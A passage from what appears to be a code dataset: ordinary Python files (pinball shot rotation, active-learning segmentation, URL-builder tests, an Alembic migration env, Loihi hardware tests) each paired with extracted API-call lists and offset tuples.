to the left or the right, and the shot on the end rolls over to the
taret on the other end.
Args:
direction: String that specifies whether the rotation direction is
to the left or right. Values are 'right' or 'left'. Default of
None will cause the shot group to rotate in the direction as
specified by the rotation_pattern.
Note that this shot group must, and rotation_events for this
shot group, must both be enabled for the rotation events to work.
"""
if not self.rotation_enabled:
self.debug_log("Received rotation request. "
"Rotation Enabled: %s. Will NOT rotate",
self.rotation_enabled)
return
# shot_state_list is deque of tuples (state num, show step num)
shot_state_list = deque()
shots_to_rotate = []
for shot in self.config['shots']:
if shot.can_rotate:
shots_to_rotate.append(shot)
shot_state_list.append(shot.state)
# figure out which direction we're going to rotate
if not direction:
direction = self.rotation_pattern[0]
self.rotation_pattern.rotate(-1)
self.debug_log("Since no direction was specified, pulling from"
" rotation pattern: '%s'", direction)
# rotate that list
if direction.lower() in ('right', 'r'):
shot_state_list.rotate(1)
else:
shot_state_list.rotate(-1)
# step through all our shots and update their states
for i, shot in enumerate(shots_to_rotate):
shot.jump(state=shot_state_list[i], force=True)
@event_handler(8)
def event_rotate_right(self, **kwargs):
"""Handle rotate right control event."""
del kwargs
self.rotate_right()
def rotate_right(self):
"""Rotate the state of the shots to the right.
This method is the same as calling rotate('right')
"""
self.rotate(direction='right')
@event_handler(7)
def event_rotate_left(self, **kwargs):
"""Handle rotate left control event."""
del kwargs
self.rotate_left()
def rotate_left(self):
"""Rotate the state of the shots to the left.
This method is the same as calling rotate('left')
"""
self.rotate(direction='left')
|
[
"mpf.core.device_monitor.DeviceMonitor",
"collections.deque",
"mpf.core.events.event_handler"
] |
[((279, 328), 'mpf.core.device_monitor.DeviceMonitor', 'DeviceMonitor', (['"""common_state"""', '"""rotation_enabled"""'], {}), "('common_state', 'rotation_enabled')\n", (292, 328), False, 'from mpf.core.device_monitor import DeviceMonitor\n'), ((3187, 3203), 'mpf.core.events.event_handler', 'event_handler', (['(2)'], {}), '(2)\n', (3200, 3203), False, 'from mpf.core.events import event_handler\n'), ((3462, 3478), 'mpf.core.events.event_handler', 'event_handler', (['(3)'], {}), '(3)\n', (3475, 3478), False, 'from mpf.core.events import event_handler\n'), ((3743, 3759), 'mpf.core.events.event_handler', 'event_handler', (['(1)'], {}), '(1)\n', (3756, 3759), False, 'from mpf.core.events import event_handler\n'), ((4012, 4028), 'mpf.core.events.event_handler', 'event_handler', (['(4)'], {}), '(4)\n', (4025, 4028), False, 'from mpf.core.events import event_handler\n'), ((5142, 5158), 'mpf.core.events.event_handler', 'event_handler', (['(9)'], {}), '(9)\n', (5155, 5158), False, 'from mpf.core.events import event_handler\n'), ((5544, 5560), 'mpf.core.events.event_handler', 'event_handler', (['(2)'], {}), '(2)\n', (5557, 5560), False, 'from mpf.core.events import event_handler\n'), ((5953, 5969), 'mpf.core.events.event_handler', 'event_handler', (['(4)'], {}), '(4)\n', (5966, 5969), False, 'from mpf.core.events import event_handler\n'), ((8250, 8266), 'mpf.core.events.event_handler', 'event_handler', (['(8)'], {}), '(8)\n', (8263, 8266), False, 'from mpf.core.events import event_handler\n'), ((8608, 8624), 'mpf.core.events.event_handler', 'event_handler', (['(7)'], {}), '(7)\n', (8621, 8624), False, 'from mpf.core.events import event_handler\n'), ((1424, 1470), 'collections.deque', 'deque', (["self.profile.config['rotation_pattern']"], {}), "(self.profile.config['rotation_pattern'])\n", (1429, 1470), False, 'from collections import deque\n'), ((7375, 7382), 'collections.deque', 'deque', ([], {}), '()\n', (7380, 7382), False, 'from collections import deque\n')]
|
import argparse
from copy import deepcopy
from pprint import pprint
import torch.backends
from PIL import Image
from torch import optim
from torchvision.transforms import transforms
from tqdm import tqdm
from baal import get_heuristic, ActiveLearningLoop
from baal.bayesian.dropout import MCDropoutModule
from baal import ModelWrapper
from baal import ClassificationReport
from baal import PILToLongTensor
from utils import pascal_voc_ids, active_pascal, add_dropout, FocalLoss
try:
import segmentation_models_pytorch as smp
except ImportError:
raise Exception('This example requires `smp`.\n pip install segmentation_models_pytorch')
import torch
import torch.nn.functional as F
import numpy as np
def mean_regions(n, grid_size=16):
# Compute the mean uncertainty per regions.
# [batch_size, W, H]
n = torch.from_numpy(n[:, None, ...])
# [Batch_size, 1, grid, grid]
out = F.adaptive_avg_pool2d(n, grid_size)
return np.mean(out.view([-1, grid_size ** 2]).numpy(), -1)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("--al_step", default=200, type=int)
parser.add_argument("--batch_size", default=8, type=int)
parser.add_argument("--initial_pool", default=40, type=int)
parser.add_argument("--n_data_to_label", default=20, type=int)
parser.add_argument("--lr", default=0.001)
parser.add_argument("--heuristic", default="random", type=str)
parser.add_argument("--reduce", default="sum", type=str)
parser.add_argument("--data_path", default="/data", type=str)
parser.add_argument("--iterations", default=20, type=int)
parser.add_argument("--learning_epoch", default=50, type=int)
return parser.parse_args()
def get_datasets(initial_pool, path):
IM_SIZE = 224
# TODO add better data augmentation scheme.
transform = transforms.Compose(
[transforms.Resize(512), transforms.CenterCrop(IM_SIZE), transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]), ])
test_transform = transforms.Compose(
[transforms.Resize(512), transforms.CenterCrop(IM_SIZE), transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]), ])
target_transform = transforms.Compose(
[transforms.Resize(512, interpolation=Image.NEAREST), transforms.CenterCrop(IM_SIZE),
PILToLongTensor(pascal_voc_ids)])
active_set, test_set = active_pascal(path=path,
transform=transform,
test_transform=test_transform,
target_transform=target_transform)
active_set.label_randomly(initial_pool)
return active_set, test_set
def main():
args = parse_args()
batch_size = args.batch_size
use_cuda = torch.cuda.is_available()
hyperparams = vars(args)
pprint(hyperparams)
active_set, test_set = get_datasets(hyperparams['initial_pool'], hyperparams['data_path'])
# We will use the FocalLoss
criterion = FocalLoss(gamma=2, alpha=0.25)
# Our model is a simple Unet
model = smp.Unet(
encoder_name='resnext50_32x4d',
encoder_depth=5,
encoder_weights='imagenet',
decoder_use_batchnorm=False,
classes=len(pascal_voc_ids)
)
# Add a Dropout layerto use MC-Dropout
add_dropout(model, classes=len(pascal_voc_ids), activation=None)
# This will enable Dropout at test time.
model = MCDropoutModule(model)
# Put everything on GPU.
if use_cuda:
model.cuda()
# Make an optimizer
optimizer = optim.SGD(model.parameters(), lr=hyperparams["lr"], momentum=0.9, weight_decay=5e-4)
# Keep a copy of the original weights
initial_weights = deepcopy(model.state_dict())
# Add metrics
model = ModelWrapper(model, criterion)
model.add_metric('cls_report', lambda: ClassificationReport(len(pascal_voc_ids)))
# Which heuristic you want to use?
# We will use our custom reduction function.
heuristic = get_heuristic(hyperparams['heuristic'], reduction=mean_regions)
# The ALLoop is in charge of predicting the uncertainty and
loop = ActiveLearningLoop(active_set,
model.predict_on_dataset_generator,
heuristic=heuristic,
ndata_to_label=hyperparams['n_data_to_label'],
# Instead of predicting on the entire pool, only a subset is used
max_sample=1000,
batch_size=batch_size,
iterations=hyperparams["iterations"],
use_cuda=use_cuda
)
acc = []
for epoch in tqdm(range(args.al_step)):
# Following Gal et al. 2016, we reset the weights.
model.load_state_dict(initial_weights)
# Train 50 epochs before sampling.
model.train_on_dataset(active_set, optimizer, batch_size, hyperparams['learning_epoch'],
use_cuda)
# Validation!
model.test_on_dataset(test_set, batch_size, use_cuda)
should_continue = loop.step()
metrics = model.metrics
val_loss = metrics['test_loss'].value
logs = {
"val": val_loss,
"epoch": epoch,
"train": metrics['train_loss'].value,
"labeled_data": active_set.labelled,
"Next Training set size": len(active_set),
'cls_report': metrics['test_cls_report'].value,
}
pprint(logs)
acc.append(logs)
if not should_continue:
break
if __name__ == "__main__":
main()
|
[
"baal.bayesian.dropout.MCDropoutModule",
"baal.get_heuristic",
"baal.ActiveLearningLoop",
"argparse.ArgumentParser",
"utils.active_pascal",
"torchvision.transforms.transforms.ToTensor",
"torch.nn.functional.adaptive_avg_pool2d",
"utils.FocalLoss",
"torch.cuda.is_available",
"pprint.pprint",
"baal.ModelWrapper",
"torchvision.transforms.transforms.CenterCrop",
"torchvision.transforms.transforms.Normalize",
"baal.PILToLongTensor",
"torchvision.transforms.transforms.Resize",
"torch.from_numpy"
] |
[((829, 862), 'torch.from_numpy', 'torch.from_numpy', (['n[:, None, ...]'], {}), '(n[:, None, ...])\n', (845, 862), False, 'import torch\n'), ((907, 942), 'torch.nn.functional.adaptive_avg_pool2d', 'F.adaptive_avg_pool2d', (['n', 'grid_size'], {}), '(n, grid_size)\n', (928, 942), True, 'import torch.nn.functional as F\n'), ((1039, 1064), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (1062, 1064), False, 'import argparse\n'), ((2444, 2559), 'utils.active_pascal', 'active_pascal', ([], {'path': 'path', 'transform': 'transform', 'test_transform': 'test_transform', 'target_transform': 'target_transform'}), '(path=path, transform=transform, test_transform=test_transform,\n target_transform=target_transform)\n', (2457, 2559), False, 'from utils import pascal_voc_ids, active_pascal, add_dropout, FocalLoss\n'), ((2841, 2866), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (2864, 2866), False, 'import torch\n'), ((2900, 2919), 'pprint.pprint', 'pprint', (['hyperparams'], {}), '(hyperparams)\n', (2906, 2919), False, 'from pprint import pprint\n'), ((3065, 3095), 'utils.FocalLoss', 'FocalLoss', ([], {'gamma': '(2)', 'alpha': '(0.25)'}), '(gamma=2, alpha=0.25)\n', (3074, 3095), False, 'from utils import pascal_voc_ids, active_pascal, add_dropout, FocalLoss\n'), ((3502, 3524), 'baal.bayesian.dropout.MCDropoutModule', 'MCDropoutModule', (['model'], {}), '(model)\n', (3517, 3524), False, 'from baal.bayesian.dropout import MCDropoutModule\n'), ((3843, 3873), 'baal.ModelWrapper', 'ModelWrapper', (['model', 'criterion'], {}), '(model, criterion)\n', (3855, 3873), False, 'from baal import ModelWrapper\n'), ((4065, 4128), 'baal.get_heuristic', 'get_heuristic', (["hyperparams['heuristic']"], {'reduction': 'mean_regions'}), "(hyperparams['heuristic'], reduction=mean_regions)\n", (4078, 4128), False, 'from baal import get_heuristic, ActiveLearningLoop\n'), ((4205, 4449), 'baal.ActiveLearningLoop', 'ActiveLearningLoop', (['active_set', 'model.predict_on_dataset_generator'], {'heuristic': 'heuristic', 'ndata_to_label': "hyperparams['n_data_to_label']", 'max_sample': '(1000)', 'batch_size': 'batch_size', 'iterations': "hyperparams['iterations']", 'use_cuda': 'use_cuda'}), "(active_set, model.predict_on_dataset_generator,\n heuristic=heuristic, ndata_to_label=hyperparams['n_data_to_label'],\n max_sample=1000, batch_size=batch_size, iterations=hyperparams[\n 'iterations'], use_cuda=use_cuda)\n", (4223, 4449), False, 'from baal import get_heuristic, ActiveLearningLoop\n'), ((5626, 5638), 'pprint.pprint', 'pprint', (['logs'], {}), '(logs)\n', (5632, 5638), False, 'from pprint import pprint\n'), ((1868, 1890), 'torchvision.transforms.transforms.Resize', 'transforms.Resize', (['(512)'], {}), '(512)\n', (1885, 1890), False, 'from torchvision.transforms import transforms\n'), ((1892, 1922), 'torchvision.transforms.transforms.CenterCrop', 'transforms.CenterCrop', (['IM_SIZE'], {}), '(IM_SIZE)\n', (1913, 1922), False, 'from torchvision.transforms import transforms\n'), ((1924, 1945), 'torchvision.transforms.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (1943, 1945), False, 'from torchvision.transforms import transforms\n'), ((1956, 2022), 'torchvision.transforms.transforms.Normalize', 'transforms.Normalize', (['[0.485, 0.456, 0.406]', '[0.229, 0.224, 0.225]'], {}), '([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n', (1976, 2022), False, 'from torchvision.transforms import transforms\n'), ((2077, 2099), 'torchvision.transforms.transforms.Resize', 'transforms.Resize', (['(512)'], {}), '(512)\n', (2094, 2099), False, 'from torchvision.transforms import transforms\n'), ((2101, 2131), 'torchvision.transforms.transforms.CenterCrop', 'transforms.CenterCrop', (['IM_SIZE'], {}), '(IM_SIZE)\n', (2122, 2131), False, 'from torchvision.transforms import transforms\n'), ((2133, 2154), 'torchvision.transforms.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (2152, 2154), False, 'from torchvision.transforms import transforms\n'), ((2165, 2231), 'torchvision.transforms.transforms.Normalize', 'transforms.Normalize', (['[0.485, 0.456, 0.406]', '[0.229, 0.224, 0.225]'], {}), '([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n', (2185, 2231), False, 'from torchvision.transforms import transforms\n'), ((2289, 2340), 'torchvision.transforms.transforms.Resize', 'transforms.Resize', (['(512)'], {'interpolation': 'Image.NEAREST'}), '(512, interpolation=Image.NEAREST)\n', (2306, 2340), False, 'from torchvision.transforms import transforms\n'), ((2342, 2372), 'torchvision.transforms.transforms.CenterCrop', 'transforms.CenterCrop', (['IM_SIZE'], {}), '(IM_SIZE)\n', (2363, 2372), False, 'from torchvision.transforms import transforms\n'), ((2383, 2414), 'baal.PILToLongTensor', 'PILToLongTensor', (['pascal_voc_ids'], {}), '(pascal_voc_ids)\n', (2398, 2414), False, 'from baal import PILToLongTensor\n')]
|
""" Test suite for the murls module. """
from murls import http, https
def test_init():
assert http('site.com') == 'http://site.com'
assert https('site.com') == 'https://site.com'
def test_path():
url = http('site.com')
assert url.path('foo', 'bar') == 'http://site.com/foo/bar'
assert url.path('foo') == 'http://site.com/foo'
def test_query():
url = http('site.com')
assert url.query(foo='bar', bar='foo') == 'http://site.com?foo=bar&bar=foo' or 'http://site.com?bar=foo&foo=bar'
assert url.query(foo='foo') == 'http://site.com?foo=foo&bar=foo' or 'http://site.com?bar=foo&foo=foo'
|
[
"murls.http",
"murls.https"
] |
[((221, 237), 'murls.http', 'http', (['"""site.com"""'], {}), "('site.com')\n", (225, 237), False, 'from murls import http, https\n'), ((383, 399), 'murls.http', 'http', (['"""site.com"""'], {}), "('site.com')\n", (387, 399), False, 'from murls import http, https\n'), ((103, 119), 'murls.http', 'http', (['"""site.com"""'], {}), "('site.com')\n", (107, 119), False, 'from murls import http, https\n'), ((152, 169), 'murls.https', 'https', (['"""site.com"""'], {}), "('site.com')\n", (157, 169), False, 'from murls import http, https\n')]
|
import os
import sys
import asyncio
import debugpy
from sqlalchemy import engine_from_config
from sqlalchemy import pool
from sqlalchemy.ext.asyncio import AsyncEngine
from sqlalchemy.ext.asyncio import create_async_engine
from alembic import context
from alembic.config import Config
# debugpy.listen(5678)
# print("Waiting for debugger attach")
# debugpy.wait_for_client()
# debugpy.breakpoint()
# print('break on this line')
# print("==== start alembic ==")
# https://stackoverflow.com/a/66772223/6652082
if sys.platform.startswith("win"):
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
sys.path.append(
os.path.dirname(
os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
)
)
from app.models.base import Base
from app import create_app
try:
config = context.config # noqa
except Exception:
ini_path = os.path.join(
os.path.dirname(os.path.abspath(__file__)), "../alembic.ini"
)
ini_path = os.path.abspath(ini_path)
config = Config(ini_path)
# add your model's MetaData object here
# for 'autogenerate' support
# from myapp import mymodel
# target_metadata = mymodel.Base.metadata
target_metadata = None
# other values from the config, defined by the needs of env.py,
# can be acquired:
# my_important_option = config.get_main_option("my_important_option")
# ... etc.
# https://gist.github.com/utek/6163250
def exclude_tables_from_config(config_):
tables_ = config_.get("tables", None)
if tables_ is not None:
tables = tables_.split(",")
else:
tables = []
new_tables = []
for table in tables:
table = table.strip()
new_tables.append(table)
return new_tables
# [alembic:exclude]
# table_col = products.create_at, users.updated_at
def exclude_colum_from_config(config_):
columns_ = config_.get("table_col")
if columns_ is not None:
columns = columns_.split(",")
else:
columns = []
new_columns = []
for column in columns:
column = column.strip()
new_columns.append(column)
return new_columns
exclude_tables = exclude_tables_from_config(
config.get_section("alembic:exclude")
)
exclude_table_cols = exclude_colum_from_config(
config.get_section("alembic:exclude")
)
def include_object(object, name, type_, *args, **kwargs):
ret_table = not (type_ == "table" and name in exclude_tables)
ret_col = not (type_ == "column" and name in exclude_table_cols)
return ret_table and ret_col
application = create_app(os.getenv("FASTAPI_CONFIG") or "default")
target_metadata = Base.metadata
def get_url():
global application
url = application.config["DATABASE_URI"]
return url
def run_migrations_offline():
"""Run migrations in 'offline' mode.
This configures the context with just a URL
and not an Engine, though an Engine is acceptable
here as well. By skipping the Engine creation
we don't even need a DBAPI to be available.
Calls to context.execute() here emit the given string to the
script output.
"""
print("offline mode")
global configure
url = get_url()
context.configure(
url=url,
target_metadata=target_metadata,
literal_binds=True,
include_object=include_object,
dialect_opts={"paramstyle": "named"},
)
with context.begin_transaction():
context.run_migrations()
def do_run_migrations(connection):
context.configure(
connection=connection,
target_metadata=target_metadata,
include_object=include_object,
)
with context.begin_transaction():
context.run_migrations()
async def run_migrations_online():
"""Run migrations in 'online' mode.
In this scenario we need to create an Engine
and associate a connection with the context.
"""
print("online mode")
url = get_url()
# connectable = AsyncEngine(
# engine_from_config(
# config,
# url=url,
# prefix="sqlalchemy.",
# poolclass=pool.NullPool,
# future=True,
# )
# )
connectable = create_async_engine(url, future=True, echo=True)
async with connectable.connect() as connection:
await connection.run_sync(do_run_migrations)
if __name__ == "__main__":
# run_migrations_offline()
asyncio.run(run_migrations_online())
else:
if context.is_offline_mode():
run_migrations_offline()
else:
asyncio.run(run_migrations_online())
print("==== end alembic ==")
|
[
"sys.platform.startswith",
"alembic.context.is_offline_mode",
"os.path.abspath",
"alembic.config.Config",
"alembic.context.begin_transaction",
"sqlalchemy.ext.asyncio.create_async_engine",
"alembic.context.configure",
"alembic.context.run_migrations",
"os.getenv",
"asyncio.WindowsSelectorEventLoopPolicy"
] |
[((515, 545), 'sys.platform.startswith', 'sys.platform.startswith', (['"""win"""'], {}), "('win')\n", (538, 545), False, 'import sys\n'), ((3228, 3381), 'alembic.context.configure', 'context.configure', ([], {'url': 'url', 'target_metadata': 'target_metadata', 'literal_binds': '(True)', 'include_object': 'include_object', 'dialect_opts': "{'paramstyle': 'named'}"}), "(url=url, target_metadata=target_metadata, literal_binds=\n True, include_object=include_object, dialect_opts={'paramstyle': 'named'})\n", (3245, 3381), False, 'from alembic import context\n'), ((3537, 3645), 'alembic.context.configure', 'context.configure', ([], {'connection': 'connection', 'target_metadata': 'target_metadata', 'include_object': 'include_object'}), '(connection=connection, target_metadata=target_metadata,\n include_object=include_object)\n', (3554, 3645), False, 'from alembic import context\n'), ((4223, 4271), 'sqlalchemy.ext.asyncio.create_async_engine', 'create_async_engine', (['url'], {'future': '(True)', 'echo': '(True)'}), '(url, future=True, echo=True)\n', (4242, 4271), False, 'from sqlalchemy.ext.asyncio import create_async_engine\n'), ((4492, 4517), 'alembic.context.is_offline_mode', 'context.is_offline_mode', ([], {}), '()\n', (4515, 4517), False, 'from alembic import context\n'), ((581, 621), 'asyncio.WindowsSelectorEventLoopPolicy', 'asyncio.WindowsSelectorEventLoopPolicy', ([], {}), '()\n', (619, 621), False, 'import asyncio\n'), ((1056, 1081), 'os.path.abspath', 'os.path.abspath', (['ini_path'], {}), '(ini_path)\n', (1071, 1081), False, 'import os\n'), ((1095, 1111), 'alembic.config.Config', 'Config', (['ini_path'], {}), '(ini_path)\n', (1101, 1111), False, 'from alembic.config import Config\n'), ((2614, 2641), 'os.getenv', 'os.getenv', (['"""FASTAPI_CONFIG"""'], {}), "('FASTAPI_CONFIG')\n", (2623, 2641), False, 'import os\n'), ((3434, 3461), 'alembic.context.begin_transaction', 'context.begin_transaction', ([], {}), '()\n', (3459, 3461), False, 'from alembic import context\n'), ((3471, 3495), 'alembic.context.run_migrations', 'context.run_migrations', ([], {}), '()\n', (3493, 3495), False, 'from alembic import context\n'), ((3683, 3710), 'alembic.context.begin_transaction', 'context.begin_transaction', ([], {}), '()\n', (3708, 3710), False, 'from alembic import context\n'), ((3720, 3744), 'alembic.context.run_migrations', 'context.run_migrations', ([], {}), '()\n', (3742, 3744), False, 'from alembic import context\n'), ((673, 698), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (688, 698), False, 'import os\n'), ((780, 805), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (795, 805), False, 'import os\n'), ((990, 1015), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (1005, 1015), False, 'import os\n')]
|
from abc import ABC, abstractmethod
from collections import OrderedDict
from functools import reduce
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import gym
import matplotlib.pyplot as plt
class Params():
"""
policy which outputs the policy parameters directly, i.e. for direct optimization
"""
def __init__(self, dim_in=7, dim_act=6):
self.dim_act = dim_act
self.init_params()
def init_params(self):
self.params = np.random.randn(self.dim_act)/3 - 1.75
self.num_params = self.dim_act
def forward(self, obs):
return self.get_params()
def get_params(self):
return self.params
def set_params(self, params):
assert params.shape == self.params.shape
self.params = params
def reset(self):
pass
if __name__ == "__main__":
# run tests
print("OK")
|
[
"numpy.random.randn"
] |
[((517, 546), 'numpy.random.randn', 'np.random.randn', (['self.dim_act'], {}), '(self.dim_act)\n', (532, 546), True, 'import numpy as np\n')]
|
from sklearn.model_selection import StratifiedKFold
import pandas as pd
skf = StratifiedKFold(n_splits=10, random_state=48, shuffle=True)
def CV(predictors,target):
for fold, (train_index, test_index) in enumerate(skf.split(predictors, target)):
x_train, x_valid = pd.DataFrame(predictors.iloc[train_index]), pd.DataFrame(predictors.iloc[test_index])
y_train, y_valid = target.iloc[train_index], target.iloc[test_index]
return x_train, x_valid, y_train, y_valid
|
[
"pandas.DataFrame",
"sklearn.model_selection.StratifiedKFold"
] |
[((79, 138), 'sklearn.model_selection.StratifiedKFold', 'StratifiedKFold', ([], {'n_splits': '(10)', 'random_state': '(48)', 'shuffle': '(True)'}), '(n_splits=10, random_state=48, shuffle=True)\n', (94, 138), False, 'from sklearn.model_selection import StratifiedKFold\n'), ((284, 326), 'pandas.DataFrame', 'pd.DataFrame', (['predictors.iloc[train_index]'], {}), '(predictors.iloc[train_index])\n', (296, 326), True, 'import pandas as pd\n'), ((328, 369), 'pandas.DataFrame', 'pd.DataFrame', (['predictors.iloc[test_index]'], {}), '(predictors.iloc[test_index])\n', (340, 369), True, 'import pandas as pd\n')]
|
import socket
import nengo
import numpy as np
import pytest
from nengo.exceptions import SimulationError
from nengo_loihi.block import Axon, LoihiBlock, Synapse
from nengo_loihi.builder.builder import Model
from nengo_loihi.builder.discretize import discretize_model
from nengo_loihi.hardware import interface as hardware_interface
from nengo_loihi.hardware.allocators import Greedy
from nengo_loihi.hardware.builder import build_board
from nengo_loihi.hardware.nxsdk_shim import NxsdkBoard
class MockNxsdk:
def __init__(self):
self.__version__ = None
def test_error_on_old_version(monkeypatch):
mock = MockNxsdk()
mock.__version__ = "0.5.5"
monkeypatch.setattr(hardware_interface, "nxsdk", mock)
with pytest.raises(ImportError, match="nxsdk"):
hardware_interface.HardwareInterface.check_nxsdk_version()
def test_no_warn_on_current_version(monkeypatch):
mock = MockNxsdk()
mock.__version__ = str(hardware_interface.HardwareInterface.max_nxsdk_version)
monkeypatch.setattr(hardware_interface, "nxsdk", mock)
monkeypatch.setattr(hardware_interface, "assert_nxsdk", lambda: True)
with pytest.warns(None) as record:
hardware_interface.HardwareInterface.check_nxsdk_version()
assert len(record) == 0
def test_warn_on_future_version(monkeypatch):
mock = MockNxsdk()
mock.__version__ = "100.0.0"
monkeypatch.setattr(hardware_interface, "nxsdk", mock)
monkeypatch.setattr(hardware_interface, "assert_nxsdk", lambda: True)
with pytest.warns(UserWarning):
hardware_interface.HardwareInterface.check_nxsdk_version()
def test_builder_poptype_errors():
pytest.importorskip("nxsdk")
# Test error in build_synapse
model = Model()
block = LoihiBlock(1)
block.compartment.configure_lif()
model.add_block(block)
synapse = Synapse(1)
synapse.set_weights([[1]])
synapse.pop_type = 8
block.add_synapse(synapse)
discretize_model(model)
allocator = Greedy() # one core per ensemble
board = allocator(model, n_chips=1)
with pytest.raises(ValueError, match="unrecognized pop_type"):
build_board(board)
# Test error in build_axon
model = Model()
block0 = LoihiBlock(1)
block0.compartment.configure_lif()
model.add_block(block0)
block1 = LoihiBlock(1)
block1.compartment.configure_lif()
model.add_block(block1)
axon = Axon(1)
block0.add_axon(axon)
synapse = Synapse(1)
synapse.set_weights([[1]])
synapse.pop_type = 8
axon.target = synapse
block1.add_synapse(synapse)
discretize_model(model)
board = allocator(model, n_chips=1)
with pytest.raises(ValueError, match="unrecognized pop_type"):
build_board(board)
def test_host_snip_recv_bytes():
host_snip = hardware_interface.HostSnip(None)
# We bypass the host_snip.connect method and connect manually
host_address = "127.0.0.1" # Standard loopback interface address
# Configure socket to send data to itself
host_snip.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
host_snip.socket.bind((host_address, host_snip.port))
host_snip.socket.connect((host_address, host_snip.port))
# Generate random data to send
data = np.random.randint(0, 8192, size=1100, dtype=np.int32)
# Correctly receive data in two chunks
# Note that chunks are 4096 bytes at the smallest (HostSnip.recv_size)
host_snip.send_all(data)
received = host_snip.recv_bytes(1024 * 4)
assert np.all(received == data[:1024])
rest = 1100 - 1024
received = host_snip.recv_bytes(rest * 4)
assert np.all(received == data[-rest:])
# Send too little data
host_snip.send_all(data)
with pytest.raises(RuntimeError, match="less than expected"):
host_snip.recv_bytes(1536 * 4)
# Send shutdown signal at the end
data[-1] = -1
host_snip.send_all(data)
with pytest.raises(RuntimeError, match="shutdown signal from chip"):
host_snip.recv_bytes(1100 * 4)
# Too little data with shutdown signal still raises too little data
host_snip.send_all(data)
with pytest.raises(RuntimeError, match="less than expected"):
host_snip.recv_bytes(2048 * 4)
@pytest.mark.target_loihi
def test_interface_connection_errors(Simulator, monkeypatch):
with nengo.Network() as net:
nengo.Ensemble(2, 1)
# test opening closed interface error
sim = Simulator(net)
interface = sim.sims["loihi"]
interface.close()
with pytest.raises(SimulationError, match="cannot be reopened"):
with interface:
pass
sim.close()
# test failed connection error
def start(*args, **kwargs):
raise Exception("Mock failure to connect")
monkeypatch.setattr(NxsdkBoard, "start", start)
with pytest.raises(SimulationError, match="Mock failure to connect"):
with Simulator(net):
pass
@pytest.mark.filterwarnings("ignore:Model is precomputable.")
@pytest.mark.target_loihi
def test_snip_input_count(Simulator, seed, plt):
with nengo.Network(seed=seed) as model:
a = nengo.Ensemble(100, 1)
for i in range(30):
stim = nengo.Node(0.5)
nengo.Connection(stim, a, synapse=None)
with Simulator(model, precompute=False) as sim:
with pytest.warns(UserWarning, match="Too many spikes"):
sim.run(0.01)
|
[
"nengo_loihi.builder.builder.Model",
"nengo_loihi.block.Axon",
"numpy.random.randint",
"nengo.Connection",
"nengo_loihi.hardware.builder.build_board",
"pytest.warns",
"nengo.Node",
"nengo_loihi.block.LoihiBlock",
"nengo_loihi.hardware.interface.HostSnip",
"pytest.raises",
"nengo.Network",
"nengo_loihi.hardware.allocators.Greedy",
"nengo.Ensemble",
"numpy.all",
"pytest.importorskip",
"nengo_loihi.block.Synapse",
"nengo_loihi.hardware.interface.HardwareInterface.check_nxsdk_version",
"pytest.mark.filterwarnings",
"nengo_loihi.builder.discretize.discretize_model"
] |
[((4928, 4988), 'pytest.mark.filterwarnings', 'pytest.mark.filterwarnings', (['"""ignore:Model is precomputable."""'], {}), "('ignore:Model is precomputable.')\n", (4954, 4988), False, 'import pytest\n'), ((1655, 1683), 'pytest.importorskip', 'pytest.importorskip', (['"""nxsdk"""'], {}), "('nxsdk')\n", (1674, 1683), False, 'import pytest\n'), ((1731, 1738), 'nengo_loihi.builder.builder.Model', 'Model', ([], {}), '()\n', (1736, 1738), False, 'from nengo_loihi.builder.builder import Model\n'), ((1751, 1764), 'nengo_loihi.block.LoihiBlock', 'LoihiBlock', (['(1)'], {}), '(1)\n', (1761, 1764), False, 'from nengo_loihi.block import Axon, LoihiBlock, Synapse\n'), ((1845, 1855), 'nengo_loihi.block.Synapse', 'Synapse', (['(1)'], {}), '(1)\n', (1852, 1855), False, 'from nengo_loihi.block import Axon, LoihiBlock, Synapse\n'), ((1948, 1971), 'nengo_loihi.builder.discretize.discretize_model', 'discretize_model', (['model'], {}), '(model)\n', (1964, 1971), False, 'from nengo_loihi.builder.discretize import discretize_model\n'), ((1989, 1997), 'nengo_loihi.hardware.allocators.Greedy', 'Greedy', ([], {}), '()\n', (1995, 1997), False, 'from nengo_loihi.hardware.allocators import Greedy\n'), ((2202, 2209), 'nengo_loihi.builder.builder.Model', 'Model', ([], {}), '()\n', (2207, 2209), False, 'from nengo_loihi.builder.builder import Model\n'), ((2223, 2236), 'nengo_loihi.block.LoihiBlock', 'LoihiBlock', (['(1)'], {}), '(1)\n', (2233, 2236), False, 'from nengo_loihi.block import Axon, LoihiBlock, Synapse\n'), ((2317, 2330), 'nengo_loihi.block.LoihiBlock', 'LoihiBlock', (['(1)'], {}), '(1)\n', (2327, 2330), False, 'from nengo_loihi.block import Axon, LoihiBlock, Synapse\n'), ((2410, 2417), 'nengo_loihi.block.Axon', 'Axon', (['(1)'], {}), '(1)\n', (2414, 2417), False, 'from nengo_loihi.block import Axon, LoihiBlock, Synapse\n'), ((2459, 2469), 'nengo_loihi.block.Synapse', 'Synapse', (['(1)'], {}), '(1)\n', (2466, 2469), False, 'from nengo_loihi.block import Axon, LoihiBlock, Synapse\n'), ((2589, 2612), 'nengo_loihi.builder.discretize.discretize_model', 'discretize_model', (['model'], {}), '(model)\n', (2605, 2612), False, 'from nengo_loihi.builder.discretize import discretize_model\n'), ((2800, 2833), 'nengo_loihi.hardware.interface.HostSnip', 'hardware_interface.HostSnip', (['None'], {}), '(None)\n', (2827, 2833), True, 'from nengo_loihi.hardware import interface as hardware_interface\n'), 